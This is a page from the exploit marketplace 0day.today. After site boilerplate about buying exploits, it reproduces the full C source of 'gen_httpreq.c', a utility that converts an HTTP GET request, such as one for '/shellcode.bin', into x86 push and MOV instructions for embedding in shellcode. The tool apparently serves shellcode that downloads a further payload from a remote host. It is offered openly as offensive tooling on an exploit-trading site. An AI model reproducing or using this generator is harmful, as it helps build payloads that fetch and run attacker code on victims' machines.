0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Utility for generating HTTP/1.x requests for shellcodes
======================================================= Utility for generating HTTP/1.x requests for shellcodes ======================================================= /* * gen_httpreq.c, utility for generating HTTP/1.x requests for shellcodes * * SIZES: * * HTTP/1.0 header request size - 18 bytes+ * HTTP/1.1 header request size - 26 bytes+ * * NOTE: The length of the selected HTTP header is stored at EDX register. * Thus the generated MOV instruction (to EDX/DX/DL) is size-based. * * - izik@tty64.org */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <stdarg.h> #include <string.h> #define X86_PUSH \ 0x68 #define X86_MOV_TO_DL(x) \ printf("\t\"\\xb2\\x%02x\"\n", x & 0xFF); #define X86_MOV_TO_DX(x) \ printf("\t\"\\x66\\xba\\x%02x\\x%02x\"\n", \ (x & 0xFF), ((x >> 8) & 0xFF)); #define X86_MOV_TO_EDX(x) \ printf("\t\"\\xba\\x%02x\\x%02x\\x%02x\\x%02x\"\n", \ (x & 0xFF), ((x >> 8) & 0xFF), ((x >> 16) & 0xFF), ((x >> 24) & 0xFF)); void usage(char *); int printx(char *fmt, ...); int main(int argc, char **argv) { if (argc < 2) { usage(argv[0]); return -1; } if (argv[2][0] != '/') { fprintf(stderr, "filename must begin with '/' as any sane URL! (e.g. /index.html)\n"); return -1; } if (!strcmp(argv[1], "-0")) { return printx("GET %s HTTP/1.0\r\n\r\n", argv[2]); } if (!strcmp(argv[1], "-1")) { if (argc != 4) { fprintf(stderr, "missing <host>, required parameter for HTTP/1.1 header! (e.g. www.tty64.org)\n"); return -1; } return printx("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n", argv[2], argv[3]); } fprintf(stderr, "%s: unknown http protocol, try -0 or -1\n", argv[1]); return -1; } /* * usage, display usage screen * * basename, barrowed argv[0] */ void usage(char *basename) { printf( "usage: %s <-0|-1> <filename> [<host>]\n\n" "\t -0, HTTP/1.0 GET request\n" "\t -1, HTTP/1.1 GET request\n" "\t <filename>, given filename (e.g. /shellcode.bin)\n" "\t <host>, given hostname (e.g. www.tty64.org) [required for HTTP 1.1]\n\n", basename); return ; } /* * printx, fmt string. generate the shellcode chunk * * fmt, given format string */ int printx(char *fmt, ...) { va_list ap; char buf[256], pad_buf[4], *w_buf; int pad_length, buf_length, i, tot_length; memset(buf, 0x0, sizeof(buf)); va_start(ap, fmt); vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap); buf_length = strlen(buf); printf("\nURL: %s\n", buf); printf("Header Length: %d bytes\n", buf_length); for (i = 1; buf_length > (i * 4); i++) { pad_length = ((i+1)*4) - buf_length; } printf("Padding Length: %d bytes\n\n", pad_length); tot_length = buf_length + pad_length; w_buf = buf; if (pad_length) { w_buf = calloc(tot_length, sizeof(char)); if (!w_buf) { perror("calloc"); return -1; } i = index(buf, '/') - buf; memset(pad_buf, 0x2f, sizeof(pad_buf)); memcpy(w_buf, buf, i); memcpy(w_buf+i, pad_buf, pad_length); memcpy(w_buf+pad_length+i, buf+i, buf_length - i); } for (i = tot_length - 1; i > -1; i-=4) { printf("\t\"\\x%02x\\x%02x\\x%02x\\x%02x\\x%02x\" // pushl $0x%02x%02x%02x%02x\n", X86_PUSH, w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i], w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i]); } if (pad_length) { free(w_buf); } // // The EDX register is assumed to be zero-out within the shellcode. // if (tot_length < 256) { // 8bit value X86_MOV_TO_DL(tot_length); } else if (tot_length < 655356) { // 16bit value X86_MOV_TO_DX(tot_length); } else { // 32bit value, rarely but possible ;-) X86_MOV_TO_EDX(tot_length); } fputc('\n', stdout); return 1; } # 0day.today [2024-12-24] #